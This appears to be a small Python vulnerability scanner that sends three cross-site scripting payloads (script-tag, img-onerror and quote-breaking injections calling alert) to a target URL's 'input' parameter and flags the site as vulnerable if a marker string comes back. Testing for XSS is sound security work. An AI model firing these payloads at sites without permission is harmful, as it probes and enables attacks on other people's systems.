## xss_exploit.py

class XSSExploit:
    """
    This class is responsible for testing XSS (Cross-Site Scripting) vulnerabilities on a given target URL.
    """

    def test_xss(self, target_url: str) -> dict:
        """
        Tests for XSS vulnerabilities at the specified target URL.

        Args:
            target_url (str): The URL of the target site to test for XSS vulnerabilities.

        Returns:
            dict: A dictionary containing the results of the test, including success status and details.
        """
        findings = {
            'url': target_url,
            'vulnerability': 'XSS',
            'status': 'Not Vulnerable',
            'details': None
        }

        # Example payloads for testing XSS
        unique_identifier = "uniqueXSS"
        payloads = [
            f"<script>alert('{unique_identifier}');</script>",
            f"<img src='invalid' onerror='alert(\"{unique_identifier}\")'>",
            f"'\"><script>alert('{unique_identifier}')</script>"
        ]

        for payload in payloads:
            # Constructing the URL to include the payload
            test_url = f"{target_url}?input={payload}"
            try:
                response = self.send_request(test_url)
                if self.is_vulnerable(response, unique_identifier):
                    findings['status'] = 'Vulnerable'
                    findings['details'] = f"Payload that succeeded: {payload}"
                    break
            except Exception as e:
                findings['details'] = str(e)
                break

        return findings

    def send_request(self, url: str):
        """
        Sends a HTTP request to the given URL.

        Args:
            url (str): The URL to which the request is to be sent.

        Returns:
            str: The response from the server.
        """
        import http.client
        from urllib.parse import urlparse

        parsed_url = urlparse(url)
        query = parsed_url.query
        path = parsed_url.path
        if query:
            path += '?' + query
        conn = http.client.HTTPConnection(parsed_url.netloc)
        conn.request("GET", path)
        response = conn.getresponse()
        return response.read().decode('utf-8')

    def is_vulnerable(self, response: str, unique_identifier: str) -> bool:
        """
        Determines if the response indicates an XSS vulnerability.

        Args:
            response (str): The server response to analyze.
            unique_identifier (str): A unique identifier used in the payload to detect XSS execution.

        Returns:
            bool: True if the response includes the executed script, False otherwise.
        """
        # Check for the unique identifier in the response
        return unique_identifier in response
